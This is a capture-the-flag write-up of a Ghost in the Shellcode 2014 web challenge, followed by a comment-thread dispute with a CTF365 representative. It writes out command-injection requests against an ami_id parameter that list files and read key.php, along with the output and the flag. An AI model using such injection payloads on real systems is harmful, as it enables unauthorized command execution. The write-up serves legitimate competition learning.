This weekend we have 46 hours of hard ctf. Organization let tou play a ‘doom-style’ game that could be decompiled and must be pwned to achieve some missions.
This task is one of two web challenges, a parody of CTF365 (lol).Going to ctf247.2014.ghostintheshellcode.com. was pretty simple since we notice there was a command injection on one of the parameters (ami_id):
/ec2.php?utf8=✓&ami_id=ami-4be3d522&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server
First we are going to see what files are available:
/ec2.php?utf8=✓&ami_id=1;ls *&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server
16K -rw-r--r-- 1 0 16K Jan 19 16:24 index.html 4.0K -rw-r--r-- 1 0 86 Jan 19 15:27 key.php 4.0K -rw-r--r-- 1 0 2.5K Jan 18 21:16 ec2.php ec2-api-tools-1.6.12.0: total 104K 4.0K drwxr-xr-x 3 0 4.0K Jan 19 13:44 . 36K drwxr-xr-x 2 0 36K Jan 19 13:44 bin 4.0K drwxr-xr-x 4 0 4.0K Jan 18 21:17 .. 48K -rw-r--r-- 1 0 46K Jan 18 21:16 THIRDPARTYLICENSE.TXT 8.0K -rw-r--r-- 1 0 4.8K Jan 18 21:16 license.txt 4.0K -rw-r--r-- 1 0 539 Jan 18 21:16 notice.txt ... ... ...
So key.php have the flag, let’s dump it. I have place ami_id=2;cat%20key.php, but nothing happens (even viewing source code), so let’s use ‘more’
/ec2.php?utf8=✓&ami_id=1;more%20key.php&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server
Finally get the flag that was hidden as a comment:
flag: 0aea26e968895efa40b563e3e8fe8f19
Done :)
Glad you guys had such fun. Keep up the good work. Any questions, just ask.
Hey! would like to be part of your site, but, as we talk in twitter months ago, was not possible. The really fun was on the GhostIntheShellCode2014 CTF.
I hope you enjoy also, you participated ?
Regards.
No I haven’t pariticipated. Regarding our Alpha/Beta stage, Alpha is a very young stage and we have very limited slots for it. In Alpha we try to find our bugs/vulnerabilities, see how users interacts and how useful would be for ITC community with a focus on infosec, sysadmin and web developers. Is not focus on learning or practice. Alpha is for testing what we have.
We let only security professionals trainers/teachers, infosec companies representatives, web development company representatives or companies that have Red/Blue Teams departments.
You can read more about Alpha here: http://blog.ctf365.com/ctf365-alpha-stage-started/
Strikes me that you confuse this entry with your own site!. Anyway, I have to say that all ctf I’ve been playing was designed to train/practice people in a wide range of infosec categories, don’t know anyone that didn’t have this feature. And obviously you don’t know who are playing every time in other ctf’s: From profesionals to talented students. You should not assume that others are not professionals (web developers, teachers, … )
Why you don’t join and try (after your Alpha/Beta stage development) ? Sure you can see the differences and learn a lot.
Regards,
tunelko.
It has this feature (training/learning). What I told you is that being in Alpha we’re focus on the platform to improve it. The teams already hack each other getting points badges and ranks. Also having in view that we host all the VM’s infrastructure there is not a lot of room for everyone. I wish to had the logistics and be able to let everybody to play with. This is the only reason why for now we let just this kind of professionals. More over, we let also students to try it/play with. The only condition for students is that their teacher have to make a request.
And no, I don’t confuse with my own site, I just want to give you as much information as possible when you ask. And yes we let also teachers, web developers,… . It stays written right on that above blog entry.
Cheers,
Marius
Sorry man, this is you first comment at the writeup post of GhostInTheShellCode2014 web task:
«Glad you guys had such fun. Keep up the good work. Any questions, just ask.»
Has something to do CTF247 with your site CTF365, (except the author’s joke :) ) ? Nothing! So, ok, spam here your platform, no problem, sure there’s a person interested on it. But not me.
Thanks :)
pd: thread closed
Nice write up! Your first one should be «/ec2.php?utf8=%E2%9C%93&ami_id=1;ls%20*&virtual_machine%5Bhost%5D=&virtual_machine%5Bimage_id%5D=&commit=Create+Server» though.
Thanks! Yes the first one ec2.php parameter request was only to show the original :)
Regards!